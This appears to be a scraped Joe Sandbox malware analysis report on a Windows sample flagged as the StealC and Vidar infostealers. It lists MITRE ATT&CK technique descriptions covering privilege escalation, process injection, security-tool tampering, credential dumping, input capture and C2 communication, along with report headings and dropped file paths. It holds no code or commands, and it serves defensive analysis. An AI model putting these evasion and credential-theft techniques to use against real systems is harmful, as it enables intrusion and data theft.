Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VucRf0jboS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKEGHIJJEHJDGCBFHCGIJEBAAA

C:\ProgramData\BGCBGCAF

C:\ProgramData\CGIEGHJE

C:\ProgramData\DVWHKMNFNN.docx

C:\ProgramData\DVWHKMNFNN.xlsx

C:\ProgramData\EBKEHJJDAAAAKECBGHDAAAFCGC

C:\ProgramData\EFOYFBOLXA.xlsx

C:\ProgramData\EGCFIDAFBFBAKFHJEGIJ

Windows Analysis Report
VucRf0jboS.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre